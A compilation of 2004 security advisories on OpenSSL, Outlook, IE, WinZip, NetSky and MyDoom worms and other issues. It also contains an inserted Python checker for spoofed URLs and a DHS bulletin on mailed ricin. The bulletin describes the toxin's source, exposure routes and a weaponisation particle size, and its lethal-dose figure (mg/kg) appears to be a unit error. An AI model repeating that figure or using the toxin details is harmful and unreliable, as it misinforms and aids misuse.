http://www.cisco.com/en/US/products/products_security_advisory09186a0080207d5f.shtml
(available to non-registered users)

Posted: March 17, 2004

Summary: A new vulnerability in the OpenSSL implementation for SSL has been announced on March 17, 2004.

An affected network device running an SSL server based on an affected OpenSSL implementation may be
vulnerable to a Denial of Service (DoS) attack. There are workarounds available to mitigate the effects
of this vulnerability on Cisco products in the workaround section of this advisory. Cisco is providing
fixed software, and recommends that customers upgrade to it when it is available.
 

-----BEGIN PGP SIGNED MESSAGE-----

--------------------------------------------------------------------
Title: Microsoft Office Security Bulletin Summary for
       March 2004
Issued: March 09, 2004
Revised: March 10, 2004
Version Number: 2.0
Bulletin:
http://www.microsoft.com/technet/security/bulletin/offmar04.mspx

--------------------------------------------------------------------
Reason for Major Revision
=========================
Subsequent to the release of the Office Security Bulletin Summary
for March 2004, the following bulletin has undergone a major
revision increment. Please see the appropriate bulletin section
of this email for more details.

* MS04-009

Summary:
========
Included in this advisory is an update for a newly discovered
vulnerability in Microsoft Office. This vulnerability has been rated
Critical:

** Critical Security Bulletins

    MS04-009 - Vulnerability in Microsoft Outlook Could Allow Code
               Execution (828040)

             - Affected Software:
               - Office XP Service Pack 2 
               - Outlook 2002 Service Pack 2
              
             - Impact: Remote Code Execution
             - Version Number: 1.0


Reason for Major Revision
=========================
Subsequent to the release of this bulletin, it was determined that
this vulnerability could also affect users who do not have the
"Outlook Today" folder home page as their default home page in
Outlook 2002. As a result, Microsoft has re-released this bulletin
with a new severity rating of "critical" to reflect the expanded
attack vector. The update released with the original version of this
security bulletin is effective in protecting from the vulnerability
and users who have applied the update or have installed
Office XP Service Pack 3 do not need to take additional action.
In addition, Microsoft is making available an additional
"client update" for customers on the Microsoft Download Center.
This additional update does not contain new fixes or functionality,
but is instead an additional offering of the update that provides
an alternative for customers.

Update Availability:
===================
An update is available to fix this vulnerability.
For additional information, including Technical Details,
Workarounds, answers to Frequently Asked Questions, and Update
Deployment Information please read the Microsoft Office Security
Bulletin Summary for March at:
http://www.microsoft.com/technet/security/bulletin/offmar04.mspx


Support:
========
Technical support is available from Microsoft Product Support
Services at 1-866-PC SAFETY (1-866-727-2338). There is no
charge for support calls associated with security patches.
International customers can get support from their local Microsoft
subsidiaries. Phone numbers for international support can be found
at: http://support.microsoft.com/common/international.aspx
 
Additional Resources:
=====================
* Microsoft has created a free monthly e-mail newsletter containing
  valuable information to help you protect your network. This
  newsletter provides practical security tips, topical security
  guidance, useful resources and links, pointers to helpful
  community resources, and a forum for you to provide feedback
  and ask security-related questions.
  You can sign up for the newsletter at:

  http://www.microsoft.com/technet/security/secnews/default.mspx

* Join Microsoft's webcast for a live discussion of the technical
  details of the February security bulletins and steps you can take
  to protect your environment. Details about the live webcast
  can be found at:
  http://go.microsoft.com/fwlink/?LinkId=24513

  The on-demand version of the webcast will be available 24 hours
  after the live webcast at:
  http://go.microsoft.com/fwlink/?LinkId=24513

* Protect your PC: Microsoft has provided information on how you
  can help protect your PC at the following locations:

  http://www.microsoft.com/security/protect/

  If you receive an e-mail that claims to be distributing a
  Microsoft security patch, it is a hoax that may be distributing a
  virus. Microsoft does not distribute security patches via e-mail.
  You can learn more about Microsoft's software distribution
  policies here:

  http://www.microsoft.com/technet/security/topics/policy/swdist.mspx

Acknowledgments:
================
Microsoft thanks the following for working with us to protect
customers:

- - iDefense
     (http://www.idefense.com)
- - Jouko Pynnönen
     (http://iki.fi/jouko)

Revisions:
==========
* V1.0 March 09, 2004: Bulletin published.
* V2.0 March 10, 2004: Bulletin updated to reflect on a revised
                        severity rating of Critical and to advise
                        of a new client update.
- --------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS
PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT
DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING
THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE.
IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE
LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL
DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN
ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY
FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING
LIMITATION MAY NOT APPLY.
- --------------------------------------------------------------------





*******************************************************************

You have received this e-mail bulletin because of your subscription to the Microsoft Product Security Notification Service.  For more information on this service, please visit http://www.microsoft.com/technet/security/notify.asp.
 
To verify the digital signature on this bulletin, please download our PGP key at http://www.microsoft.com/technet/security/notify.asp.
 
For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security.
 

Security Alert, March 2, 2004

NetSky.D Worm Spreading Rapidly
A new variant of the NetSky worm, NetSky.D, is spreading rapidly.
The worm spreads by sending copies of itself through its own SMTP
engine. Copies of the worm target email addresses harvested by
scanning disk drives (C through Z) of an infected system and network.
NetSky.D tries to disable other worms, such as MyDoom.A and MyDoom.B,
and deletes various registry keys.
http://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?IdVirus=45205&sind=0
 

Security Alert February 29, 2004

New type of Phishing Attack 2/29/04

There is a new type of MALWARE attack that I have been receiving for the last couple of weeks. It appears to be a reference to an eBay auction, but it's a bogus auction number, and there appears to be some sort of link involving JavaScript. The IP address that is referenced traces out to a site on Charter Cable in Wisconsin in at least one case.

What makes this interesting is I have no auctions running now; nor have I auctioned this item! This item does not even cross-reference on eBay, so I am certain that it's not a reference to a valid auction.

I have not seen this referenced in any alerts or bulletins, but I would think that eBay (copied) would be all over this. I have had 2 that were almost identical except for a slight change in wording. If it's a phishing scam, it's clever; auctioneers would certainly be enticed to check and see why they are receiving email for what looks to be an auction that they are erroneously responsible for. If it's a worm
attack, I haven't seen this before and it's potentially dangerous. If you are seeing similar messages, please forward the message on to the antivirus vendors and eBay as well for action.
Full text of phishing messages and details available here.

Security Alert, February 27, 2004

Heap Overflow in ISS RealSecure and BlackICE Servers
   Barnaby Jack discovered that a heap-overflow vulnerability in
Internet Security Systems' (ISS's) RealSecure and BlackICE servers can
result in the arbitrary execution of code on the vulnerable server.
This vulnerability is a result of a flaw that exists within the
component that handles the processing of Server Message Block (SMB)
packets. ISS has released patches for the affected servers and
recommends that affected users immediately apply them.
   http://secadministrator.com/articles/index.cfm?articleid=41873

For complete details about this vulnerability, as well as links to
patches, be sure to visit our Web site at the provided URL.
 

Security Alert, February 20, 2004

Arbitrary Code Execution in Check Point VPN-1 Server/SecureRemote/
SecureClient

   Mark Dowd and Neel Mehta discovered that a vulnerability in
Check Point VPN-1 Server and Client software can result in the
compromise of the vulnerable system. This vulnerability exists because
the product doesn't perform adequate bounds checking, thereby
triggering a simple stack overflow. This vulnerability occurs during
the handling of ISAKMP packets that have large Certificate Request
payloads. During the initial phases of an IKE negotiation, a remote
unauthenticated attacker can take advantage of this problem.
Check Point has issued an update about this vulnerability and
recommends that affected users immediately apply the available patch.
   http://secadministrator.com/articles/index.cfm?articleid=41737

Multiple Vulnerabilities in Check Point Firewall-1 NG AI and HTTP
Security Server
   Mark Dowd discovered that Check Point Firewall-1 NG AI and HTTP
Security Server contain multiple remotely exploitable format-string
vulnerabilities that can result in the compromise of the vulnerable
firewall. Check Point has issued an update about these vulnerabilities
and recommends that affected users immediately apply the available
patch.
   http://secadministrator.com/articles/index.cfm?articleid=41736

Multiple Vulnerabilities in RealPlayer and RealOne Player
  Mark Litchfield discovered that RealNetworks' RealOne Player and
RealPlayer contain multiple vulnerabilities, the most serious of which
can result in arbitrary code execution on the vulnerable system. This
vulnerability is a result of a flaw in the way the SurfNOW proxy
server handles long HTTP headers. RealNetworks has issued a notice
about these vulnerabilities and recommends that affected users
immediately apply the available update.
   http://secadministrator.com/articles/index.cfm?articleid=41735
 

February 18, IDG News Service - Experts warn of new NetSky worm variant.
Anti-virus software companies are warning that a new version of the NetSky
e-mail worm is circulating on the Internet. NetSky.B, also known as
Moodown.B, first appeared Wednesday, February 18, and is spreading through
infected e-mail messages and shared network folders. Once installed, NetSky
tries to disable antivirus software, steal e-mail addresses and copy itself
to shared network folders, anti-virus companies said. The new worm is a
modified version of NetSky.A, which appeared on Monday. Like its
predecessor, NetSky.B arrives in e-mail messages that have randomly
generated subject lines such as "something for you," "hello" or "fake." The
worm file is contained in a zipped attachment that also has a randomly
generated name and file type such as "document" "stuff" or "party." Most
copies of the worm appear to be coming from the Netherlands and elsewhere in
Europe. Users are advised to update their anti-virus software as soon as
possible. Source:
http://www.computerworld.com/securitytopics/security/virus/story/0,10801,90264,00.html
 

Security Alert, February 12, 2004

Denial of Service in WINS

   Qualys discovered that WINS contains a Denial of Service (DoS)
vulnerability. This vulnerability stems from the method that WINS uses
to validate the length of specially crafted packets. On Windows 2003,
this vulnerability could permit an attacker who sends a series of
specially crafted packets to a WINS server to cause the service to
fail. Windows 2000 contains the same vulnerable code, but the DoS
condition isn't present. Microsoft has released security bulletin
MS04-006, "Vulnerability in the Windows Internet Naming Service (WINS)
Could Allow Code Execution (830352)," to address this vulnerability
and recommends that affected users immediately apply the appropriate
patch listed in the bulletin.
   http://secadministrator.com/articles/index.cfm?articleid=41749

Security Alert, February 9, 2004

Multiple Vulnerabilities in Microsoft IE
   Microsoft has reported that Internet Explorer (IE) contains three
vulnerabilities, one of which was discovered by Andreas Sandblad. The
most serious vulnerability can result in the execution of arbitrary
code on the vulnerable computer.
   The first of these three newly discovered vulnerabilities is a
cross-domain security vulnerability in the IE model, which prevents
windows of different domains from sharing information. The second
vulnerability involves performing a drag-and-drop operation with
function pointers during dynamic HTML (DHTML) events in IE. This
vulnerability could permit a file to be saved in a target location on
the user's system if the user clicked a link. The third vulnerability
involves the incorrect parsing of URLs that contain special
characters. When combined with a misuse of the basic authentication
feature that puts "username:password@" at the beginning of a URL, this
vulnerability could result in a misrepresentation of the URL in the
address bar of an IE window.
   Microsoft has released security bulletin MS04-003, "Cumulative
Security Update for Internet Explorer (832894)," to address these
vulnerabilities and recommends that affected users immediately apply
the appropriate patch listed in the bulletin.
   http://secadministrator.com/articles/index.cfm?articleid=41698

For complete details about these vulnerabilities, as well as links to
patches, be sure to visit our Web site at the provided URL.
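The URL-misrepresentation issue in the MS04-003 summary above, as an added defender-side check that is not part of the original alert: it resolves where a "username:password@" link really goes (the host after the last "@" in the authority, which is how browsers resolve it) and flags userinfo that is shaped like a hostname or carries the control characters the alert mentions. The sample URLs, `analyse_url`, `suspicious_links` and `HOSTLIKE` are constructed for this example.

```python
"""Flag links that use the "username:password@" URL form to misrepresent
the destination (the MS04-003 address-bar issue).  Added example, not code
from the original alert; the sample URLs below are constructed."""
import re
from urllib.parse import urlsplit, unquote

# Constructed sample links (RFC 5737 documentation addresses, not real sites).
SAMPLE_URLS = [
    "http://www.example.com/news/index.html",
    "http://www.example.com@203.0.113.5/login.html",
    "http://www.example.com%01@203.0.113.5/login.html",
    "http://user:secret@intranet.example.net/",
    "https://203.0.113.5/path?next=http://www.example.com",
]

# A username shaped like a registrable hostname (label.label.tld).
HOSTLIKE = re.compile(r"^[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$")
# Raw control bytes; percent-encoded ones are exposed by unquote() first.
CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def analyse_url(url):
    """Return where the URL really resolves and why (if at all) it is suspicious.

    Browsers and urlsplit both treat everything before the last "@" in the
    authority as userinfo; the real host is what follows it.  The vulnerable
    IE build displayed the userinfo part instead when "special characters"
    preceded the "@", so the reader saw www.example.com while the request
    went to 203.0.113.5.
    """
    parts = urlsplit(url)
    real_host = parts.hostname or ""
    reasons = []
    if "@" in parts.netloc:
        userinfo = unquote(parts.netloc.rpartition("@")[0])
        # Control bytes have no legitimate use in credentials.
        if CONTROL.search(userinfo):
            reasons.append("control characters in userinfo")
        username = CONTROL.sub("", userinfo).split(":", 1)[0]
        # Real credentials are short tokens; a hostname-shaped username is
        # almost always an attempt to spoof the site the reader thinks they see.
        if HOSTLIKE.match(username):
            reasons.append("userinfo looks like a hostname: " + username)
    return {
        "url": url,
        "real_host": real_host,
        "reasons": reasons,
        "suspicious": bool(reasons),
    }


def suspicious_links(urls):
    """Reduce a list of links (e.g. extracted from an e-mail) to spoof candidates."""
    results = [analyse_url(u) for u in urls]
    return [r for r in results if r["suspicious"]]


if __name__ == "__main__":
    for hit in suspicious_links(SAMPLE_URLS):
        print("%s -> really %s (%s)"
              % (hit["url"], hit["real_host"], "; ".join(hit["reasons"])))
```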


Title:  Guidance for Response to Ricin Delivered by Mail
DHS Information Bulletin
Date:  February 9, 2004

DHS intends to update this Bulletin should it receive additional relevant
information, including information provided to it by the recipients.  Based
on this notification, no change to the Homeland Security Advisory System
(HSAS) level is anticipated; the current HSAS level is YELLOW.

OVERVIEW

This is a joint DHS and FBI Information Bulletin. DHS Information Bulletins
communicate issues that pertain to the critical national infrastructure and
are for informational purposes only.

While DHS possesses no information indicating specific terrorist targeting
of U.S. critical infrastructures through the delivery by mail of the toxin
ricin, such targeting would be consistent with certain terrorists' stated
objectives to disrupt and undermine vital economic interests in this
country.

DETAILS

On the afternoon of February 2, 2004, Senate staff observed gray granular
powder on an automated mail opening system.  Preliminary field tests
indicated the possible presence of a biological toxin. Samples of the
material were tested overnight at a government laboratory and results
indicated the presence of ricin. The three Senate Office Buildings were
closed and secured on February 3rd.  The samples were forwarded to the
Centers for Disease Control and Prevention in Atlanta, Georgia and on
February 4th three out of the four samples tested positive.  At this time no
threat letter has been identified and no threat has been received.

Past incidents involving the presence of ricin have occurred in the United
States and the United Kingdom. On October 15, 2003, a postal worker
discovered a business-size envelope containing the toxin ricin in a mail
distribution facility in Greenville, South Carolina.  The letter, which was
addressed to the U.S. Department of Transportation, did not pass through the
postal system.  In January 2003, law enforcement agencies in the United
Kingdom searched several locations in London as part of an ongoing
counterterrorism investigation and found small amounts of ricin, as well as
equipment that could be used in its production.  In April 1991, several
members of a domestic extremist group in Minnesota extracted ricin from
castor beans and discussed using it against federal law enforcement
officers.  The amount of ricin produced could have killed more than 100
people if effectively delivered.


Background on Ricin

Ricin is a poison that can be made from the waste (mash) left over from
processing castor beans. Ricin can be made in the form of an off-white
powder, a mist, or a pellet or it can be dissolved in water or weak acid. It
would take a deliberate act to make Ricin and use it to poison people. Ricin
is one of several toxins that exert toxicity by inhibiting protein
synthesis. Ricin can enter the body through inhalation, ingestion, abraded
(non-intact) skin, mucosal membranes (e.g., eyes and nose), and injection.
Ricin poisoning is not contagious, and person-to-person transmission does
not occur.

Toxicity

Exposure to ricin may occur through:

  - Inhalation, skin, or eye contact: as an aerosol, powder, or dust
  - Ingestion: through contamination of food, water, or consumer products
  - Injection: directly through the skin
Ricin toxicity and lethality can vary by dose and route of exposure.  In
animal studies, inhalation and intravenous injection have been shown as the
most lethal routes.  The lethal dose for humans, by inhalation or injection,
is estimated to be 5 - 10 mg/kg.  Because the ricin protein is large, it is
not well absorbed orally or through the skin.

To date ricin poisonings have only occurred in humans after ingestion or
injection.  Ricin is considered to be a much more potent toxin when inhaled
or injected compared with other routes of exposure, however ricin would need
to be dispersed in particles smaller than 5 microns to be used as an
effective weapon via inhalation.  It is technologically difficult to produce
ricin particles of this size and purity.



For more information about ricin go to: http://www.bt.cdc.gov/agent/ricin/

SUGGESTED PROTECTIVE MEASURES

Suggested Actions for Mail Room, Postal and Shipping Facility Operators

Two categories of actions are necessary[1]:

1) Identifying and assessing biological (including ricin) threats;

2) Managing biological threats that appear credible.



1. Identifying and Assessing Biological Threats

Several commercial handheld or test-strip ricin detection devices are
available; however the Centers for Disease Control and Prevention (CDC) have
stated that the performance of these assays is unknown.  While many of these
tests indicate a high false positive, they may be more useful in ruling out
the presence of ricin.  These test kits should only be used by trained and
certified hazardous materials professionals.  If such testing is deemed
necessary, personnel should preserve original evidence for forensic
analysis.  Automated, continuously monitoring bio-detection systems are
available commercially; however they may be cost-prohibitive for many
companies.



Measures that can be taken without installing special detection equipment
are the same for most biological threats and are organized according to
whether the mail is opened or unopened and whether it contains a written
threat or an unidentified container:



Opened mail that is leaking a suspicious liquid or powder, or mail that has
a suspicious odor:  If you open a letter or package and see an unknown
material, or if an unknown material is leaking from the mail as a liquid,
powder, or odor, do not try to clean it up or otherwise disturb it.  Set the
mail down on a stable surface and call the first responder designated to
respond to this type of threat, e.g., the HAZMAT team at the local fire and
rescue department.



Opened mail that contains a written threat:  If anyone in the organization
opens a letter or package with or without powder and discovers a written
threat, such as a note that says "You have been contaminated with ricin,"
put the package or letter down on a stable surface and call the first
responder designated to deal with this type of threat.  The mail center
supervisor or the first responder must ensure that local law enforcement
authorities and the FBI local field office are notified in either of these
events.



Unopened mail:  Whenever a mail center worker identifies an unopened package
or letter as "suspicious", a mail center supervisor or specially trained
employee should examine the mail piece to confirm that it meets the
"suspicious" criteria established for the location (e.g., it is covered with
powder or appears saturated from the inside).  If confirmed, do not open it.
A supervisor or designated mail center worker who is trained to confirm the
identification must be available during all working hours.



Next, determine if the mail piece is addressed to a person who actually
works in the facility.  If so, and if the addressee can be located in a
reasonable period of time, contact the addressee and ask him or her to
identify the package.  If the addressee recognizes the package and is
certain it is not threatening, deliver it.  If the addressee does not
recognize the package, or if you cannot locate the addressee, attempt to
contact the individual listed on the return address to verify the contents
of the package.  If you successfully contact the sender of the package, ask
them to provide a description of the contents, intended addressee, and the
reason it was mailed to your location.  Provide this information to the
addressee for further verification.

If the addressee does not recognize the package, or if you cannot locate the
addressee, do not open it.  The supervisor or designated mail center worker
should call the previously designated first responder. This first responder
will be responsible for opening the package in a controlled environment and
following the appropriate protocol for evaluation of the threat.  A
"controlled environment" may be a glove box, hood with negative airflow and
HEPA filters on the exhaust airflow, or a similar device.  When identifying
the first responder who will open suspicious letters or packages, make sure
they have a controlled environment available.

Mail that contains an unidentified secondary container:  If x-ray inspection
shows a secondary container that may contain an unknown material, or if you
open a letter or package and discover such a container, do not open or
otherwise disturb the secondary container.  Treat the secondary container as
suspicious, unopened mail.  As above, first call the addressee and see if
they can identify the container.  If he or she cannot be located, then call
in the first responder designated to open suspicious mail.

2.  Managing Biological Threats That Appear Credible

In the event that a trained first responder, after reviewing the situation,
determines that a possible biological hazard may actually be present (i.e.,
a biological agent may have been released into the workplace, or a
biological agent may be present in a package or envelope that has been
opened), the first responder should take the following steps or ensure that
these activities are performed where appropriate:



- Turn off the ventilation system, fans or window air conditioners
  for the area of potential release.

- Turn off any high-speed mail processing equipment that may have
  handled the suspicious mail piece.

- Make sure that the suspicious substance is not disturbed by
  covering it.

- Keep everyone out of any room(s) that may have been contaminated.



In addition, the first responder should immediately call local law
enforcement authorities and the FBI Field Office and ask to speak to the
Weapons of Mass Destruction (WMD) coordinator.  The FBI website is
http://www.fbi.gov. The FBI WMD coordinator will respond to the scene and
will, in conjunction with other federal, state, local, and internal experts,
conduct a threat assessment and, in conjunction with public health
officials, direct other actions to protect employees and the general public.



Suggested Actions for First Responders

Ricin should only be handled by trained and certified hazardous materials
professionals. Hazardous Materials Teams should be aware that ricin mostly
presents a particulate inhalation or splash hazard depending on the
preparation of the material. Personal protective equipment (PPE) for first
responders, including those who are decontaminating victims at the scene, is
generally determined by the Incident Commander based on the mechanism of
dispersal and whether dispersal is continuing.  Preventing droplets from
contacting broken skin or mucosal membranes (e.g., the mouth or eyes) is
important when decontaminating someone, but airborne dispersal of ricin
during decontamination is an unlikely hazard.  PPE can consist of a
chemical-resistant suit with gloves, air purifying respirator or
self-contained breathing apparatus and eye/face protection. Sampling,
seizure, or transportation of ricin should be completed only under the
authority of or in coordination with law enforcement.

Personnel who may have been exposed to ricin should wash the affected area
vigorously with soap and water. Equipment and supplies can be decontaminated
with a weak (0.5 percent) hypochlorite solution (bleach) and/or soap and
water.

Healthcare providers should report suspected or known cases of ricin
poisoning immediately to the regional poison control center (telephone,
1-800-222-1222) and to local or state public health agencies, which will
report cases to the CDC, and other federal agencies including the DHS.


DHS encourages recipients of this Information Bulletin to report information
concerning suspicious or criminal activity to local law enforcement, local
FBI's Joint Terrorism Task Force or the Homeland Security Operations Center
(HSOC).  The HSOC may be contacted at:   Phone: (202) 282-8101 or by email
at HSCenter@dhs.gov.

--------------------------------------------------------------------------------


[1] Adapted from GSA Policy Advisory: National Guidelines for Assessing and
Managing Biological Threats in Federal Mail Facilities; December 29, 2003

_______________________________________________
Infragard_unsecured mailing list
Infragard_unsecured@listserv.infragard.org
 

Security Alert, March 3, 2004

Buffer Overflow in WinZip
iDefense reported that a buffer-overflow vulnerability in WinZip
can result in the arbitrary execution of code on the vulnerable
system. This vulnerability is a result of a flaw in the
parameter-parsing routine. WinZip will crash when it provides long
strings to certain parameters of MIME archives (.mim, .uue, .uu, .b64,
.bhx, .hqx, and .xxe extensions). WinZip has released version 9.0,
which doesn't have the buffer-overflow vulnerability.
http://secadministrator.com/articles/index.cfm?articleid=41916

Security Alert, September 28, 2004

Multiple Vulnerabilities in Mozilla-based Web Browsers
Multiple vulnerabilities have been discovered in Mozilla, Mozilla
Firefox, and Mozilla Thunderbird, the most severe of which could
compromise a system. The vulnerabilities (discovered by Georgi
Guninski, Wladimir Palant, Gael Delalleau, Mats Palmgren, Jesse
Ruderman, Daniel Koukola, Andrew Schultz, and Harald Milz) include a
long list of problems--too many to list in this security alert! The
Mozilla organization recommends that affected users immediately
upgrade to the latest release of software. For complete details about
each of the vulnerabilities, be sure to read the article on our Web
site.
http://www.windowsitpro.com/article/articleid/43991/43991.html

Security Alert, September 30, 2004

JPEG GDI+ Trojan Horses Unleashed
Several Trojan horse programs that exploit the JPEG processing
(GDI+ API) vulnerability have been unleashed by using AOL Instant
Messenger (AIM), Usenet newsgroups, and other methods. An infected
JPEG file will typically spawn a command shell on a user's system and
then attempt to download Trojan horses and various tools for use by
the intruders. Administrators who haven't yet patched their systems
and taken other preventative measures should do so. To learn more
about the Trojan horses and preventative measures you can take, be
sure to read the following articles on our Web site:
http://www.windowsitpro.com/article/articleid/44003/44003.html
http://www.windowsitpro.com/article/articleid/44019/44019.html
http://www.windowsitpro.com/article/articleid/44001/44001.html
http://www.windowsitpro.com/article/articleid/44075/44075.html

This email newsletter is brought to you by Windows IT Pro,
the leading publication for IT professionals deploying Windows and
related technologies.

Security Alert, September 17, 2004

Buffer Overrun in Microsoft JPEG Processing (GDI+)
Nick DeBaggis discovered that a buffer-overrun vulnerability in the
processing of JPEG image formats could allow remote code execution on
a vulnerable system. Any program that processes JPEG images on the
affected systems could be vulnerable to this attack, as could any
system that uses the affected programs or components. A potential
attacker who successfully exploited this vulnerability could take
complete control of an affected system. Microsoft has released
security bulletin MS04-028, "Buffer Overrun in JPEG Processing (GDI+)
Could Allow Code Execution (833987)," to address this vulnerability
and recommends that affected users immediately apply the appropriate
patch listed in the bulletin.
http://www.windowsitpro.com/article/articleid/43968/43968.html


Message Type : Security Advisory   
   

Title: Cisco Security Advisory: Crafted Timed Attack Evades Cisco Security Agent Protections

URL:
http://www.cisco.com/en/US/customer/products/sw/secursw/ps5057/products_security_advisory09186a008034607c.shtml    
(available to registered users)

http://www.cisco.com/en/US/products/sw/secursw/ps5057/products_security_advisory09186a008034607c.shtml#summary
(available to non-registered users)

Posted: November 11, 2004

Summary: Cisco Security Agent (CSA) provides threat protection for server and desktop computing systems,
also known as endpoints. It identifies and prevents malicious behavior, thereby eliminating known and unknown
security risks.

A vulnerability exists in which a properly timed buffer overflow attack may evade the protections offered by CSA.
The system under attack must contain an unpatched underlying vulnerability in system software that CSA is configured
to protect. Another prerequisite for the attack is that a user must be interactively logged in during the attack.    
   

Security Alert, February 19, 2004

Arbitrary Code Execution in Microsoft Virtual PC for Mac
George Gal of @stake discovered that a vulnerability in Microsoft
Virtual PC for Mac 6.1 and 6.0 can result in the execution of
arbitrary code with system-level privileges. Microsoft has released
security bulletin MS04-005, "Vulnerability in Virtual PC for Mac could
lead to privilege elevation (835150)," to address this vulnerability
and recommends that affected users immediately apply the appropriate
patch listed in the bulletin.
http://secadministrator.com/articles/index.cfm?articleid=41748

Security Alert, May 28, 2004

ImageMap URL Spoof Vulnerability in Internet Explorer
Paul Kurczaba discovered that a vulnerability in Microsoft Internet
Explorer (IE) 5.0 and 6.0 could let a potential attacker spoof the URL
displayed in the lower left corner of the IE window by using a
specially coded image map. The discoverer posted the following code as
proof of concept and has made a demonstration available on his Web
site. Microsoft hasn't released a fix or bulletin that addresses this
vulnerability.
http://secadministrator.com/articles/index.cfm?articleid=42732

Security Alert, September 9, 2004

Denial of Service In Cisco IOS Telnet
Cisco Systems reported that a Denial of Service (DoS) condition
exists in all Cisco Internetwork Operating System (IOS)-based products
that use Telnet or reverse Telnet. A specifically crafted TCP
connection to a Telnet or reverse Telnet port of a Cisco Systems'
device that's running IOS might block further Telnet, reverse Telnet,
remote shell (Rsh), Secure Shell (SSH), and in some cases HTTP access
to the device. Cisco Systems has released Security Advisory 61671,
"Cisco Telnet Denial of Service Vulnerability," to address the
vulnerability and recommends that affected users immediately apply the
appropriate patch that's available via normal update channels.
http://www.windowsitpro.com/article/articleid/43817/43817.html

Security Alert, September 3, 2004

Multiple Vulnerabilities in Cisco Secure Access Control Server
Cisco Systems reported several new vulnerabilities in Cisco Secure
Access Control Server, the most severe of which could let an
unauthorized user authenticate to a server. Cisco Systems has released
security advisory 61603, "Multiple Vulnerabilities in Cisco Secure
Access Control Server," which addresses these problems and recommends
that affected users immediately apply the appropriate patch listed in
the bulletin.
http://www.windowsitpro.com/article/articleid/43781/43781.html

Security Alert, August 19, 2004

Local Privilege-Escalation Vulnerability in Serv-U FTP Server
aT4r ins4n3 discovered a local privilege-escalation vulnerability
in Rhino Software's Serv-U FTP server that could result in the running
of system commands via the loopback interface. Rhino Software hasn't
released a fix for this problem.
http://www.winnetmag.com/article/articleid/43679/43679.html

Security Alert, August 2, 2004

New Microsoft Patch for IE Fixes 3 Critical Problems
Microsoft released a new patch, MS04-025 "Cumulative Security Update
for Internet Explorer (867801)," for Internet Explorer (IE) 6.01, IE
5.5, and IE 5.01 that fixes three critical problems in the browser.
The patch will help prevent such nuisances as the Download.Ject
exploit launched against IE users last month. The patch also corrects
two buffer-overflow problems. One problem involves GIF files that can
cause a buffer overflow in mshtml.dll. The other problem involves
bitmap images, where malformed bitmap images can cause a buffer
overflow.
http://www.winnetmag.com/article/articleID/43402/43402.html

Security Alert, July 19, 2004

Arbitrary Code-Execution Vulnerability in Internet Information Server 4.0
A vulnerability in Microsoft Internet Information Server (IIS) 4.0
could result in arbitrary remote code execution and remote compromise
of the vulnerable system. This vulnerability is a result of a
buffer-overflow condition in the redirect function. Microsoft has
released bulletin MS04-021, "Security Update for IIS 4.0 (841373)," to
address this vulnerability and recommends that affected users apply
the appropriate patch listed in the bulletin.
http://secadministrator.com/articles/index.cfm?articleid=43272

Security Alert, June 21, 2004

Denial of Service in Microsoft DirectPlay
John Lampe of Tenable Network Security discovered a Denial of
Service (DoS) vulnerability in the IDirectPlay4 API of Microsoft
DirectPlay, which stems from a lack of robust packet validation.
Microsoft has released bulletin MS04-016, "Vulnerability in DirectPlay
Could Allow Denial of Service (839643)," to address this vulnerability
and recommends that affected users apply the appropriate patch listed
in the bulletin.
http://secadministrator.com/articles/index.cfm?articleid=42934

Security Alert, August 18, 2004

Denial of Service in Sygate Secure Enterprise
Martin O'Neal discovered a Denial of Service (DoS) condition that
exists in Sygate Secure Enterprise 3.5 and earlier. Sygate Secure
Enterprise uses HTTP to communicate with the Sygate Security Agent
clients. These exchanges don't implement any form of replay
protection, so an attacker can simply send repeated requests until all
the resources on the host are exhausted. The vendor, Sygate, has
released a fix for this problem--version 3.5MR3.
http://www.winnetmag.com/article/articleid/43673/43673.html

Security Alert, August 5, 2004

Remote-Compromise Vulnerability in Check Point VPN-1 Gateway
Internet Security Systems discovered that a buffer-overrun
vulnerability can allow remote compromise of a Check Point VPN-1
gateway. An Internet Security Association and Key Management Protocol
(ISAKMP) problem affects Check Point VPN-1 products during
negotiations of a VPN tunnel. When the VPN-1 server performs Abstract
Syntax Notation One (ASN.1) decoding, an attacker can trigger an
arbitrary-length heap overflow, which might result in complete
compromise of the VPN-1 server. Check Point has released "ASN.1 Alert"
to address this vulnerability and recommends that affected users
immediately apply the appropriate patch listed in the bulletin.
http://www.winnetmag.com/article/articleid/43414/43414.html

Security Alert, July 28, 2004

New MyDoom Worm Variant Is Spreading
A new MyDoom worm variant, MyDoom.M@mm, was discovered July 26.
Computers affected by the worm are used to perform queries on various
search engines to harvest email addresses. The worm collects email
addresses from a user's system by parsing various files, then spreads
by using its own built-in SMTP engine to email copies of itself to
harvested email addresses. MyDoom.M@mm tries to hide on an infected
system by installing itself using the filenames java.exe and
services.exe, both of which are placed in the Windows root directory.
The java.exe file is the worm itself, and the services.exe file is a
backdoor Trojan program that antivirus software might detect as
Backdoor.Zincite.A. The Trojan opens port 1034 for remote connections
and probes IP addresses for other systems that are listening on port
1034. For more information about the new worm, read the article on our
Web site and visit your antivirus vendor of choice for virus signature
updates.
http://www.winnetmag.com/article/articleID/43365/43365.html

Security Alert, August 9, 2004

Information-Disclosure Vulnerability in FTP GLIDE Client 2.43
Global Security Solution IT discovered a vulnerability in the
client version of FTP GLIDE 2.43 that can result in information
disclosure. FTP GLIDE stores passwords in clear text, so that any user
can view them. FTP GLIDE stores its login data at \program
files\FTPGlide\[Profile Name].ftp. The vendor, Innovative Technology
Consulting, LLC, has been notified but hasn't released a fix for the
